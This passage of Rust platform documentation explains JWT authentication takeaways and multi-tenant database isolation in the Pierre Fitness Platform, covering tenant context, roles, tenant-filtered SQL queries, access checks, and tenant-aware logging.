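    tokens.write().unwrap().insert("tok1".to_string(), 42);
    // Many readers: validations can hold the read lock concurrently
    let readers: Vec<_> = (0..4)
        .map(|_| {
            let store = Arc::clone(&tokens);
            thread::spawn(move || *store.read().unwrap().get("tok1").unwrap())
        })
        .collect();
    let sum: u64 = readers.into_iter().map(|h| h.join().unwrap()).sum();
    sum / 4
}

fn main() {
    assert_eq!(read_after_write(), 42);
}
```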
Key Takeaways
- RS256 asymmetric signing: Uses RSA key pairs from JWKS (Chapter 5) for secure token signing. Clients verify with public keys, the server signs with the private key.
- Standard JWT claims: The platform follows RFC 7519 with iss, sub, aud, exp, iat, and jti for interoperability. Custom claims extend functionality without breaking standards.
- Key rotation support: The kid (key ID) in token headers allows seamless RSA key rotation. Old tokens remain valid until expiration.
- Detailed error handling: The JwtValidationError enum provides human-readable messages for debugging ("token expired 3 hours ago" vs "invalid token").
- Middleware authentication: McpAuthMiddleware supports both JWT tokens and API keys with unified rate limiting and user context extraction.
- Token refresh pattern: Validating the old token's signature even when expired prevents forged refresh requests while improving UX.
- Multi-tenant claims: The tenant_id claim enables data isolation; the providers claim restricts access to connected fitness providers.
- Separate admin tokens: AdminTokenClaims with fine-grained permissions prevents privilege escalation from user tokens to admin APIs.
- Structured logging: #[tracing::instrument] provides observability without exposing sensitive token data in logs.
- OAuth integration: The platform generates standard OAuth 2.0 access tokens and client credentials tokens for third-party integrations.
- Cookie-based authentication: httpOnly cookies prevent XSS token theft; Secure and SameSite flags add further protection layers.
- CSRF protection: The double-submit cookie pattern with user-scoped validation prevents cross-site request forgery attacks on web applications.
- Security layering: Multiple authentication methods (cookies, Bearer tokens, API keys) coexist with middleware fallback for different client types.
Next Chapter: Chapter 07: Multi-Tenant Database Isolation - Learn how the Pierre platform enforces tenant boundaries at the database layer using JWT claims and row-level security.
Chapter 07: Multi-Tenant Database Isolation
This chapter explores how the Pierre Fitness Platform enforces strict tenant boundaries at the database layer, ensuring complete data isolation between different organizations using the same server instance. You’ll learn about tenant context extraction, role-based access control, and query-level tenant filtering.
Multi-Tenant Architecture Overview
The Pierre platform implements true multi-tenancy, where multiple organizations (tenants) share the same database and application server while maintaining complete data isolation.
Architecture Layers
┌──────────────────────────────────────────────────────────────┐
│ HTTP Request │
│ Authorization: Bearer eyJhbGc... (JWT token) │
└────────────────────────┬─────────────────────────────────────┘
│
▼
┌──────────────────────────┐
│ McpAuthMiddleware │
│ - Extract user_id │
│ - Validate JWT │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ TenantIsolation │
│ - Look up user.tenant_id│
│ - Extract TenantContext │
│ - Validate user role │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Database Queries │
│ WHERE tenant_id = $1 │
│ (automatic filtering) │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Tenant-Scoped Results │
│ (only this org's data) │
└──────────────────────────┘
Key principle: Every database query includes WHERE tenant_id = <current_tenant_id> to enforce row-level security. No query can access data from a different tenant, even if the application code has a bug.
Tenant Context Structure
The TenantContext struct carries tenant information throughout the request lifecycle:
Source: src/tenant/mod.rs:29-70
#![allow(unused)]
fn main() {
/// Tenant context for all operations
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct TenantContext {
/// Tenant ID
pub tenant_id: Uuid,
/// Tenant name for display
pub tenant_name: String,
/// User ID within tenant context
pub user_id: Uuid,
/// User's role within the tenant
pub user_role: TenantRole,
}
impl TenantContext {
/// Create new tenant context
#[must_use]
pub const fn new(
tenant_id: Uuid,
tenant_name: String,
user_id: Uuid,
user_role: TenantRole,
) -> Self {
Self {
tenant_id,
tenant_name,
user_id,
user_role,
}
}
/// Check if user has admin privileges in this tenant
#[must_use]
pub const fn is_admin(&self) -> bool {
matches!(self.user_role, TenantRole::Admin | TenantRole::Owner)
}
/// Check if user can configure OAuth apps
#[must_use]
pub const fn can_configure_oauth(&self) -> bool {
matches!(self.user_role, TenantRole::Admin | TenantRole::Owner)
}
}
}
Rust Idiom: #[derive(Clone, Serialize, Deserialize)]
The Clone derive enables passing TenantContext across async boundaries. The struct is small (4 fields, all cheap to clone) and frequently needed by multiple handlers. Cloning is more ergonomic than managing lifetimes for a shared reference.
The Serialize and Deserialize derives allow embedding TenantContext in JSON responses and session data.
Tenant Roles and Permissions
The platform defines four tenant roles with increasing privileges:
Source: src/tenant/schema.rs:11-54
#![allow(unused)]
fn main() {
/// Tenant role within an organization
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub enum TenantRole {
/// Organization owner (full permissions)
Owner,
/// Administrator (can configure OAuth, manage users)
Admin,
/// Billing manager (can view usage, manage billing)
Billing,
/// Regular member (can use tools)
Member,
}
impl TenantRole {
/// Convert from database string
#[must_use]
pub fn from_db_string(s: &str) -> Self {
match s {
"owner" => Self::Owner,
"admin" => Self::Admin,
"billing" => Self::Billing,
"member" => Self::Member,
_ => {
// Log unknown role but fallback to member for security
tracing::warn!(
"Unknown tenant role '{}' encountered, defaulting to Member",
s
);
Self::Member
}
}
}
/// Convert to database string
#[must_use]
pub const fn to_db_string(&self) -> &'static str {
match self {
Self::Owner => "owner",
Self::Admin => "admin",
Self::Billing => "billing",
Self::Member => "member",
}
}
}
}
Permission hierarchy:
- Owner: Full control, can modify tenant settings, delete tenant, manage all users
- Admin: Configure OAuth apps, manage users, access all tools
- Billing: View usage metrics, manage subscription and billing
- Member: Use tools and access their own data (no administrative functions)
Rust Idiom: Default to least privilege
The from_db_string method defaults to Member for unknown roles. This “fail-safe” approach ensures that database corruption or future role additions don’t accidentally grant excessive permissions. Always default to the most restrictive option when parsing untrusted data.
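A self-contained re-implementation makes the fail-safe behavior testable (the real method also logs a warning via tracing, omitted here):

```rust
#[derive(Debug, PartialEq)]
enum TenantRole {
    Owner,
    Admin,
    Billing,
    Member,
}

/// Parse a role string from the database, defaulting to the
/// least-privileged role for anything unrecognized.
fn from_db_string(s: &str) -> TenantRole {
    match s {
        "owner" => TenantRole::Owner,
        "admin" => TenantRole::Admin,
        "billing" => TenantRole::Billing,
        "member" => TenantRole::Member,
        // Fail-safe: unknown input never grants extra privileges
        _ => TenantRole::Member,
    }
}

fn main() {
    assert_eq!(from_db_string("owner"), TenantRole::Owner);
    // Database corruption or a future role falls back to Member
    assert_eq!(from_db_string("superuser"), TenantRole::Member);
}
```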
JWT Claims and Tenant Extraction
User authentication tokens (Chapter 6) include an optional tenant_id claim for multi-tenant deployment:
Source: src/auth.rs:108-130
#![allow(unused)]
fn main() {
/// JWT claims for user authentication
#[derive(Debug, Serialize, Deserialize)]
pub struct Claims {
pub sub: String, // User ID
pub email: String,
pub iat: i64,
pub exp: i64,
pub iss: String,
pub jti: String,
pub providers: Vec<String>,
pub aud: String,
/// Tenant ID (optional for backward compatibility with existing tokens)
#[serde(skip_serializing_if = "Option::is_none")]
pub tenant_id: Option<String>,
}
}
The platform extracts tenant context from JWT tokens during request authentication:
Source: src/mcp/tenant_isolation.rs:30-58
#![allow(unused)]
fn main() {
/// Validate JWT token and extract tenant context
///
/// # Errors
/// Returns an error if JWT validation fails or tenant information cannot be retrieved
pub async fn validate_tenant_access(&self, jwt_token: &str) -> Result<TenantContext> {
let auth_result = self
.resources
.auth_manager
.validate_token(jwt_token, &self.resources.jwks_manager)?;
// Parse user ID from claims
let user_id = crate::utils::uuid::parse_uuid(&auth_result.sub)
.map_err(|e| {
tracing::warn!(sub = %auth_result.sub, error = %e, "Invalid user ID in JWT token claims");
AppError::auth_invalid("Invalid user ID in token")
})?;
let user = self.get_user_with_tenant(user_id).await?;
let tenant_id = self.extract_tenant_id(&user)?;
let tenant_name = self.get_tenant_name(tenant_id).await;
let user_role = self.get_user_role_for_tenant(user_id, tenant_id).await?;
Ok(TenantContext {
tenant_id,
tenant_name,
user_id,
user_role,
})
}
}
Flow:
- Validate JWT signature and expiration (Chapter 6)
- Extract user_id from the sub claim
- Look up the user in the database to find their tenant_id
- Query the tenant table for tenant_name
- Look up the user's role within the tenant (Owner/Admin/Billing/Member)
- Construct a TenantContext for the request
Extracting tenant_id from the User Record
Users belong to exactly one tenant (single-tenancy per user):
Source: src/mcp/tenant_isolation.rs:73-88
#![allow(unused)]
fn main() {
/// Extract tenant ID from user
///
/// # Errors
/// Returns an error if tenant ID is missing or invalid
pub fn extract_tenant_id(&self, user: &crate::models::User) -> Result<Uuid> {
user.tenant_id
.clone() // Safe: Option<String> ownership for UUID parsing
.ok_or_else(|| -> anyhow::Error {
AppError::auth_invalid("User does not belong to any tenant").into()
})?
.parse()
.map_err(|e| -> anyhow::Error {
tracing::warn!(user_id = %user.id, tenant_id = ?user.tenant_id, error = %e, "Invalid tenant ID format for user");
AppError::invalid_input("Invalid tenant ID format").into()
})
}
}
Note: The tenant_id is stored as a string to support both formats:
- UUID-based: "550e8400-e29b-41d4-a716-446655440000"
- Slug-based: "acme-corp" for vanity URLs
The platform attempts UUID parsing first, then falls back to slug lookup.
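The UUID-first, slug-fallback decision can be sketched as below. The `looks_like_uuid` shape check is a simplified stand-in for the `uuid` crate's parser:

```rust
#[derive(Debug, PartialEq)]
enum TenantRef {
    Uuid(String),
    Slug(String),
}

/// Simplified check: five hyphen-separated hex groups of 8-4-4-4-12.
/// Stand-in for Uuid::parse_str from the uuid crate.
fn looks_like_uuid(s: &str) -> bool {
    let groups: Vec<&str> = s.split('-').collect();
    groups.len() == 5
        && groups.iter().map(|g| g.len()).eq([8usize, 4, 4, 4, 12])
        && s.chars().all(|c| c.is_ascii_hexdigit() || c == '-')
}

/// Try UUID parsing first; anything else is treated as a slug.
fn parse_tenant_ref(s: &str) -> TenantRef {
    if looks_like_uuid(s) {
        TenantRef::Uuid(s.to_string())
    } else {
        TenantRef::Slug(s.to_string())
    }
}

fn main() {
    let uuid = "550e8400-e29b-41d4-a716-446655440000";
    assert_eq!(parse_tenant_ref(uuid), TenantRef::Uuid(uuid.to_string()));
    assert_eq!(
        parse_tenant_ref("acme-corp"),
        TenantRef::Slug("acme-corp".to_string())
    );
}
```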
Database Isolation with WHERE Clauses
Every database query that accesses tenant-scoped data includes a WHERE tenant_id = ? clause:
OAuth Credentials Isolation
Tenant OAuth credentials are stored separately from user credentials:
Source: src/database_plugins/sqlite.rs:1297-1302
SELECT tenant_id, provider, client_id, client_secret_encrypted, redirect_uri, scopes, rate_limit_per_day
FROM tenant_oauth_credentials
WHERE tenant_id = ?1 AND provider = ?2 AND is_active = true
Source: src/database_plugins/postgres.rs:3151-3156
SELECT client_id, client_secret_encrypted, client_secret_nonce,
redirect_uri, scopes, rate_limit_per_day
FROM tenant_oauth_apps
WHERE tenant_id = $1 AND provider = $2 AND is_active = true
Security: The WHERE tenant_id = ? clause ensures that even if application code passes the wrong tenant ID, the database returns no results. This “defense in depth” prevents cross-tenant data leaks from programming errors.
Listing Tenant OAuth Apps
Source: src/database_plugins/sqlite.rs:1249-1254
SELECT tenant_id, provider, client_id, client_secret_encrypted, redirect_uri, scopes, rate_limit_per_day
FROM tenant_oauth_credentials
WHERE tenant_id = ?1 AND is_active = true
ORDER BY provider
Source: src/database_plugins/postgres.rs:3077-3082
SELECT provider, client_id, client_secret_encrypted, client_secret_nonce,
redirect_uri, scopes, rate_limit_per_day
FROM tenant_oauth_apps
WHERE tenant_id = $1 AND is_active = true
ORDER BY provider
Pattern: All tenant-scoped queries follow this structure:
- SELECT only needed columns
- FROM tenant-scoped table
- WHERE tenant_id = $param AND is_active = true
- ORDER BY for deterministic results
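The four-part shape above can be encoded in a small builder so the tenant filter is impossible to omit. This is a hypothetical helper for illustration; the codebase writes these queries by hand:

```rust
/// Build a tenant-scoped SELECT following the pattern:
/// columns, table, mandatory tenant_id + is_active filter, ORDER BY.
fn tenant_scoped_select(columns: &[&str], table: &str, order_by: &str) -> String {
    format!(
        "SELECT {} FROM {table} WHERE tenant_id = $1 AND is_active = true ORDER BY {order_by}",
        columns.join(", ")
    )
}

fn main() {
    let sql = tenant_scoped_select(&["provider", "client_id"], "tenant_oauth_apps", "provider");
    // The tenant filter cannot be forgotten: the builder always emits it
    assert!(sql.contains("WHERE tenant_id = $1"));
    assert!(sql.starts_with("SELECT provider, client_id FROM tenant_oauth_apps"));
}
```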
Tenant Isolation Manager
The TenantIsolation manager coordinates tenant context extraction and validation:
Source: src/mcp/tenant_isolation.rs:18-28
#![allow(unused)]
fn main() {
/// Manages tenant isolation and multi-tenancy for the MCP server
pub struct TenantIsolation {
resources: Arc<ServerResources>,
}
impl TenantIsolation {
/// Create a new tenant isolation manager
#[must_use]
pub const fn new(resources: Arc<ServerResources>) -> Self {
Self { resources }
}
}
}
Dependency: The manager holds Arc<ServerResources> to access:
- auth_manager: JWT validation
- jwks_manager: RS256 key lookup
- database: User and tenant queries
Rust Idiom: const fn new()
The const qualifier allows creating TenantIsolation at compile time if all dependencies support it. In practice, Arc<ServerResources> isn’t const-constructible, but the pattern future-proofs the API.
Role-Based Access Control
The platform validates user permissions for specific actions:
Source: src/mcp/tenant_isolation.rs:238-276
#![allow(unused)]
fn main() {
/// Validate that a user can perform an action on behalf of a tenant
///
/// # Errors
/// Returns an error if validation fails
pub async fn validate_tenant_action(
&self,
user_id: Uuid,
tenant_id: Uuid,
action: &str,
) -> Result<()> {
let user_role = self.get_user_role_for_tenant(user_id, tenant_id).await?;
match action {
"read_oauth_credentials" | "store_oauth_credentials" => {
if matches!(user_role, TenantRole::Owner | TenantRole::Member) {
Ok(())
} else {
Err(AppError::auth_invalid(format!(
"User {user_id} does not have permission to {action} for tenant {tenant_id}"
))
.into())
}
}
"modify_tenant_settings" => {
if matches!(user_role, TenantRole::Owner) {
Ok(())
} else {
Err(AppError::auth_invalid(format!(
"User {user_id} does not have owner permission for tenant {tenant_id}"
))
.into())
}
}
_ => {
warn!("Unknown action for validation: {}", action);
Err(AppError::invalid_input(format!("Unknown action: {action}")).into())
}
}
}
}
Pattern: Explicit action strings with role matching. The platform could use a more elaborate permission system (e.g., Permission enum with bitflags), but string matching provides flexibility for runtime-defined permissions.
Rust Idiom: matches!() macro
The matches!(user_role, TenantRole::Owner | TenantRole::Member) macro provides concise pattern matching for simple checks. It’s more readable than:
#![allow(unused)]
fn main() {
user_role == TenantRole::Owner || user_role == TenantRole::Member
}
Resource Access Validation
The platform validates access to specific resource types:
Source: src/mcp/tenant_isolation.rs:201-224
#![allow(unused)]
fn main() {
/// Check if user has access to a specific resource
///
/// # Errors
/// Returns an error if role lookup fails
pub async fn check_resource_access(
&self,
user_id: Uuid,
tenant_id: Uuid,
resource_type: &str,
) -> Result<bool> {
// Verify user belongs to the tenant
let user_role = self.get_user_role_for_tenant(user_id, tenant_id).await?;
// Basic access control - can be extended based on requirements
match resource_type {
"oauth_credentials" => Ok(matches!(user_role, TenantRole::Owner | TenantRole::Member)),
"fitness_data" => Ok(matches!(user_role, TenantRole::Owner | TenantRole::Member)),
"tenant_settings" => Ok(matches!(user_role, TenantRole::Owner)),
_ => {
warn!("Unknown resource type: {}", resource_type);
Ok(false)
}
}
}
}
Security: Unknown resource types return false (deny by default). This ensures that new resources added to the platform require explicit permission configuration.
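The deny-by-default branch is easy to verify with a standalone mirror of the match (an illustrative re-implementation, without the async role lookup):

```rust
#[derive(Clone, Copy)]
#[allow(dead_code)]
enum TenantRole {
    Owner,
    Admin,
    Billing,
    Member,
}

/// Mirror of the check_resource_access match: unknown resource types
/// are denied rather than allowed.
fn can_access(role: TenantRole, resource_type: &str) -> bool {
    match resource_type {
        "oauth_credentials" | "fitness_data" => {
            matches!(role, TenantRole::Owner | TenantRole::Member)
        }
        "tenant_settings" => matches!(role, TenantRole::Owner),
        // Deny by default: new resources need explicit rules
        _ => false,
    }
}

fn main() {
    assert!(can_access(TenantRole::Owner, "tenant_settings"));
    assert!(!can_access(TenantRole::Member, "tenant_settings"));
    // A resource type added later without rules is denied outright
    assert!(!can_access(TenantRole::Owner, "audit_logs"));
}
```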
Tenant Resources Wrapper
The TenantResources struct provides tenant-scoped access to database operations:
Source: src/mcp/tenant_isolation.rs:279-360
#![allow(unused)]
fn main() {
/// Tenant-scoped resource accessor
pub struct TenantResources {
/// Unique identifier for the tenant
pub tenant_id: Uuid,
/// Database connection for tenant-scoped operations
pub database: Arc<Database>,
}
impl TenantResources {
/// Get OAuth credentials for this tenant
///
/// # Errors
/// Returns an error if credential lookup fails
pub async fn get_oauth_credentials(
&self,
provider: &str,
) -> Result<Option<crate::tenant::oauth_manager::TenantOAuthCredentials>> {
self.database
.get_tenant_oauth_credentials(self.tenant_id, provider)
.await
}
/// Store OAuth credentials for this tenant
///
/// # Errors
/// Returns an error if credential storage fails or tenant ID mismatch
pub async fn store_oauth_credentials(
&self,
credential: &crate::tenant::oauth_manager::TenantOAuthCredentials,
) -> Result<()> {
// Ensure the credential belongs to this tenant
if credential.tenant_id != self.tenant_id {
return Err(AppError::invalid_input(format!(
"Credential tenant ID mismatch: expected {}, got {}",
self.tenant_id, credential.tenant_id
))
.into());
}
self.database
.store_tenant_oauth_credentials(credential)
.await
}
/// Get user OAuth tokens for this tenant
///
/// # Errors
/// Returns an error if token lookup fails
pub async fn get_user_oauth_tokens(
&self,
user_id: Uuid,
provider: &str,
) -> Result<Option<crate::models::UserOAuthToken>> {
// Convert tenant_id to string for database query
let tenant_id_str = self.tenant_id.to_string();
self.database
.get_user_oauth_token(user_id, &tenant_id_str, provider)
.await
}
/// Store user OAuth token for this tenant
///
/// # Errors
/// Returns an error if token storage fails
pub async fn store_user_oauth_token(
&self,
token: &crate::models::UserOAuthToken,
) -> Result<()> {
// Additional validation could be added here to ensure
// the user belongs to this tenant
// For now, store using the user's OAuth app approach
self.database
.store_user_oauth_app(
token.user_id,
&token.provider,
"", // client_id not available in UserOAuthToken
"", // client_secret not available in UserOAuthToken
"", // redirect_uri not available in UserOAuthToken
)
.await
}
}
}
Design pattern: Tenant-scoped wrapper. The TenantResources struct “knows” its tenant_id and automatically includes it in all database queries. This prevents forgetting to filter by tenant.
Rust Idiom: Validation at storage time
The store_oauth_credentials method validates that credential.tenant_id == self.tenant_id before storing. This prevents accidentally storing credentials for the wrong tenant, which would leak sensitive data.
Tenant-Aware Logging
The platform provides structured logging utilities that include tenant context:
Source: src/logging/tenant.rs:30-51
#![allow(unused)]
fn main() {
/// Tenant-aware logging utilities
pub struct TenantLogger;
impl TenantLogger {
/// Log MCP tool call with tenant context
pub fn log_mcp_tool_call(
user_id: Uuid,
tenant_id: Uuid,
tool_name: &str,
success: bool,
duration_ms: u64,
) {
tracing::info!(
user_id = %user_id,
tenant_id = %tenant_id,
tool_name = %tool_name,
success = %success,
duration_ms = %duration_ms,
event_type = "mcp_tool_call",
"MCP tool call completed"
);
}
}
}
Observability: Including tenant_id in all log entries enables:
- Per-tenant usage analytics
- Security audit trails (which tenant accessed what data)
- Performance debugging (is one tenant causing slow queries?)
- Billing and chargeback (which tenant consumed how many resources)
Authentication Logging
Source: src/logging/tenant.rs:54-81
#![allow(unused)]
fn main() {
/// Log authentication event with tenant context
pub fn log_auth_event(
user_id: Option<Uuid>,
tenant_id: Option<Uuid>,
auth_method: &str,
success: bool,
error_details: Option<&str>,
) {
if success {
tracing::info!(
user_id = ?user_id,
tenant_id = ?tenant_id,
auth_method = %auth_method,
success = %success,
event_type = "authentication",
"Authentication successful"
);
} else {
tracing::warn!(
user_id = ?user_id,
tenant_id = ?tenant_id,
auth_method = %auth_method,
success = %success,
error_details = ?error_details,
event_type = "authentication",
"Authentication failed"
);
}
}
}
Security: Failed authentication attempts include tenant_id (if available) to detect:
- Brute force attacks against a specific tenant
- Cross-tenant authentication attempts (attacker trying tenant A credentials against tenant B)
- Compromised user accounts
HTTP Request Logging
Source: src/logging/tenant.rs:84-115
#![allow(unused)]
fn main() {
/// Log HTTP request with tenant context
pub fn log_http_request(
user_id: Option<Uuid>,
tenant_id: Option<Uuid>,
method: &str,
path: &str,
status_code: u16,
duration_ms: u64,
) {
if status_code < crate::constants::network_config::HTTP_CLIENT_ERROR_THRESHOLD {
tracing::info!(
user_id = ?user_id,
tenant_id = ?tenant_id,
http_method = %method,
http_path = %path,
http_status = %status_code,
duration_ms = %duration_ms,
event_type = "http_request",
"HTTP request completed"
);
} else {
tracing::warn!(
user_id = ?user_id,
tenant_id = ?tenant_id,
http_method = %method,
http_path = %path,
http_status = %status_code,
duration_ms = %duration_ms,
event_type = "http_request",
"HTTP request failed"
);
}
}
}
Rust Idiom: Option<Uuid> for optional context
Not all requests have tenant context (e.g., health check endpoints, public landing pages). Using Option<Uuid> allows logging these requests with None values, which serialize as null in structured logs.
Database Operation Logging
Source: src/logging/tenant.rs:118-138
#![allow(unused)]
fn main() {
/// Log database operation with tenant context
pub fn log_database_operation(
user_id: Option<Uuid>,
tenant_id: Option<Uuid>,
operation: &str,
table: &str,
success: bool,
duration_ms: u64,
rows_affected: Option<usize>,
) {
tracing::debug!(
user_id = ?user_id,
tenant_id = ?tenant_id,
db_operation = %operation,
db_table = %table,
success = %success,
duration_ms = %duration_ms,
rows_affected = ?rows_affected,
event_type = "database_operation",
"Database operation completed"
);
}
}
Performance: Database logs use tracing::debug!() level to avoid overwhelming production systems. Enable in development with RUST_LOG=debug to troubleshoot slow queries.
Tenant Provider Isolation
Fitness provider requests use tenant-specific OAuth credentials:
Source: src/providers/tenant_provider.rs:15-47
#![allow(unused)]
fn main() {
/// Tenant-aware fitness provider that wraps existing providers with tenant context
#[async_trait]
pub trait TenantFitnessProvider: Send + Sync {
/// Authenticate using tenant-specific OAuth credentials
async fn authenticate_tenant(
&mut self,
tenant_context: &TenantContext,
provider: &str,
database: &dyn DatabaseProvider,
) -> Result<()>;
/// Get athlete information for the authenticated tenant user
async fn get_athlete(&self) -> Result<Athlete>;
/// Get activities for the authenticated tenant user
async fn get_activities(
&self,
limit: Option<usize>,
offset: Option<usize>,
) -> Result<Vec<Activity>>;
/// Get specific activity by ID
async fn get_activity(&self, id: &str) -> Result<Activity>;
/// Get stats for the authenticated tenant user
async fn get_stats(&self) -> Result<Stats>;
/// Get personal records for the authenticated tenant user
async fn get_personal_records(&self) -> Result<Vec<PersonalRecord>>;
/// Get provider name
fn provider_name(&self) -> &'static str;
}
}
Architecture: The TenantFitnessProvider trait wraps existing provider implementations (Strava, Garmin) with tenant context. When a user requests Strava data, the platform:
- Extracts
TenantContextfrom JWT - Looks up tenant’s Strava OAuth credentials (client ID, client secret)
- Uses tenant-specific credentials to fetch data
- Returns results scoped to the user within the tenant
This allows multiple tenants to use the same Strava integration with different OAuth apps.
Tenant Provider Factory
Source: src/providers/tenant_provider.rs:49-80
#![allow(unused)]
fn main() {
/// Factory for creating tenant-aware fitness providers
pub struct TenantProviderFactory {
oauth_client: Arc<TenantOAuthClient>,
}
impl TenantProviderFactory {
/// Create new tenant provider factory
#[must_use]
pub const fn new(oauth_client: Arc<TenantOAuthClient>) -> Self {
Self { oauth_client }
}
/// Create tenant-aware provider for the specified type
///
/// # Errors
///
/// Returns an error if the provider type is not supported
pub fn create_tenant_provider(
&self,
provider_type: &str,
) -> Result<Box<dyn TenantFitnessProvider>> {
match provider_type.to_lowercase().as_str() {
"strava" => Ok(Box::new(super::strava_tenant::TenantStravaProvider::new(
self.oauth_client.clone(),
))),
_ => Err(AppError::invalid_input(format!(
"Unknown tenant provider: {provider_type}. Currently supported: strava"
))
.into()),
}
}
}
}
Extensibility: The factory pattern makes it easy to add new providers (Garmin, Fitbit, Polar) by implementing TenantFitnessProvider and adding a match arm.
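As a standalone illustration of that extension point, here is a miniature, synchronous version of the factory. FitnessProvider, StravaProvider, and GarminProvider are simplified stand-ins for Pierre's async tenant-aware types; only the dispatch shape matches the real create_tenant_provider.

```rust
// Minimal stand-in for the tenant provider trait (the real trait in
// src/providers/tenant_provider.rs is async and carries tenant context).
trait FitnessProvider {
    fn provider_name(&self) -> &'static str;
}

struct StravaProvider;
struct GarminProvider;

impl FitnessProvider for StravaProvider {
    fn provider_name(&self) -> &'static str { "strava" }
}
impl FitnessProvider for GarminProvider {
    fn provider_name(&self) -> &'static str { "garmin" }
}

/// Factory dispatch: registering a new provider is one new match arm.
fn create_provider(provider_type: &str) -> Result<Box<dyn FitnessProvider>, String> {
    match provider_type.to_lowercase().as_str() {
        "strava" => Ok(Box::new(StravaProvider)),
        "garmin" => Ok(Box::new(GarminProvider)), // the newly added arm
        other => Err(format!("Unknown tenant provider: {other}")),
    }
}

fn main() {
    let provider = create_provider("Garmin").expect("garmin is registered");
    println!("{}", provider.provider_name()); // prints "garmin"
    assert!(create_provider("polar").is_err());
}
```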
Tenant Schema and Models
The database schema enforces tenant isolation with foreign key constraints:
Source: src/tenant/schema.rs:56-93
#![allow(unused)]
fn main() {
/// Tenant/Organization in the multi-tenant system
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Tenant {
/// Unique tenant identifier
pub id: Uuid,
/// Display name for the organization
pub name: String,
/// URL-safe identifier for tenant (e.g., "acme-corp")
pub slug: String,
/// Domain for custom tenant routing (optional)
pub domain: Option<String>,
/// Subscription tier
pub subscription_tier: String,
/// Whether tenant is active
pub is_active: bool,
/// When tenant was created
pub created_at: DateTime<Utc>,
/// When tenant was last updated
pub updated_at: DateTime<Utc>,
}
impl Tenant {
/// Create a new tenant
#[must_use]
pub fn new(name: String, slug: String) -> Self {
let now = Utc::now();
Self {
id: Uuid::new_v4(),
name,
slug,
domain: None,
subscription_tier: "starter".into(),
is_active: true,
created_at: now,
updated_at: now,
}
}
}
}
Fields:
- id: Primary key (UUID)
- slug: URL-safe identifier for vanity URLs (acme-corp.pierre.app)
- domain: Custom domain for white-label deployments (fitness.acme.com)
- subscription_tier: For tiered pricing (starter, professional, enterprise)
- is_active: Soft delete (deactivate tenant without deleting data)
Tenant-User Relationship
Source: src/tenant/schema.rs:95-122
#![allow(unused)]
fn main() {
/// User membership in a tenant
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct TenantUser {
/// Unique relationship identifier
pub id: Uuid,
/// Tenant ID
pub tenant_id: Uuid,
/// User ID
pub user_id: Uuid,
/// User's role in this tenant
pub role: TenantRole,
/// When user joined tenant
pub joined_at: DateTime<Utc>,
}
impl TenantUser {
/// Create new tenant-user relationship
#[must_use]
pub fn new(tenant_id: Uuid, user_id: Uuid, role: TenantRole) -> Self {
Self {
id: Uuid::new_v4(),
tenant_id,
user_id,
role,
joined_at: Utc::now(),
}
}
}
}
Design: The tenant_users junction table supports:
- Future multi-tenant users (one user, multiple tenants)
- Role changes over time (member promoted to admin)
- Audit trail (joined_at timestamp)
Currently, users belong to exactly one tenant, but the schema allows future enhancement.
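A toy model of that junction-table query shows why the design is future-proof. Here u64 stands in for Uuid and tenants_for_user is an illustrative helper, not a Pierre API; today the result has at most one element, but the same query shape serves multi-tenant users later.

```rust
// Simplified row of the tenant_users junction table (u64 in place of Uuid).
struct TenantUser {
    tenant_id: u64,
    user_id: u64,
}

/// All tenants a user belongs to. Currently at most one row per user,
/// but the junction table lets this return several without schema changes.
fn tenants_for_user(rows: &[TenantUser], user_id: u64) -> Vec<u64> {
    rows.iter()
        .filter(|r| r.user_id == user_id)
        .map(|r| r.tenant_id)
        .collect()
}

fn main() {
    let rows = vec![
        TenantUser { tenant_id: 1, user_id: 10 },
        TenantUser { tenant_id: 2, user_id: 10 }, // future: same user, second tenant
        TenantUser { tenant_id: 1, user_id: 11 },
    ];
    assert_eq!(tenants_for_user(&rows, 10), vec![1, 2]);
    assert_eq!(tenants_for_user(&rows, 99), Vec::<u64>::new());
}
```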
Tenant Usage Tracking
Source: src/tenant/schema.rs:124-143
#![allow(unused)]
fn main() {
/// Daily usage tracking per tenant per provider
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct TenantProviderUsage {
/// Unique usage record identifier
pub id: Uuid,
/// Tenant ID
pub tenant_id: Uuid,
/// Provider name
pub provider: String,
/// Usage date
pub usage_date: chrono::NaiveDate,
/// Number of successful requests
pub request_count: u32,
/// Number of failed requests
pub error_count: u32,
/// When record was created
pub created_at: DateTime<Utc>,
/// When record was last updated
pub updated_at: DateTime<Utc>,
}
}
Purpose: Per-tenant provider usage enables:
- Rate limiting enforcement (prevent one tenant from exhausting API quotas)
- Billing and chargeback (charge tenants for Strava API usage)
- Analytics (which tenants use which providers most)
- Capacity planning (do we need higher Strava rate limits?)
Rust Idiom: chrono::NaiveDate for calendar dates
Using NaiveDate (date without time zone) for usage_date avoids time zone confusion. The platform aggregates usage per calendar day in UTC, regardless of the tenant’s time zone.
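The aggregation itself is simple enough to sketch without dependencies. Below, a (year, month, day) tuple stands in for chrono::NaiveDate, and record_usage is an illustrative helper mirroring what TenantProviderUsage rows accumulate, not Pierre's actual update path.

```rust
use std::collections::HashMap;

// Stand-in for chrono::NaiveDate: a (year, month, day) calendar date in UTC.
type Day = (i32, u32, u32);

/// Accumulate (request_count, error_count) per (tenant, provider, UTC day),
/// mirroring the TenantProviderUsage schema.
fn record_usage(
    usage: &mut HashMap<(u64, String, Day), (u32, u32)>,
    tenant_id: u64,
    provider: &str,
    day: Day,
    ok: bool,
) {
    let entry = usage.entry((tenant_id, provider.to_owned(), day)).or_insert((0, 0));
    if ok { entry.0 += 1 } else { entry.1 += 1 }
}

fn main() {
    let mut usage = HashMap::new();
    let day = (2024, 1, 24);
    record_usage(&mut usage, 1, "strava", day, true);
    record_usage(&mut usage, 1, "strava", day, true);
    record_usage(&mut usage, 1, "strava", day, false);
    // 2 successful requests, 1 error for tenant 1 / strava on that day
    assert_eq!(usage[&(1, "strava".to_owned(), day)], (2, 1));
}
```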
Security Patterns and Best Practices
Defense in Depth
The platform employs multiple layers of security:
- JWT validation: Verify token signature and expiration (Chapter 6)
- Tenant extraction: Look up user’s tenant from database
- Role validation: Check user’s role within tenant
- Query filtering: Include WHERE tenant_id = ? in all queries
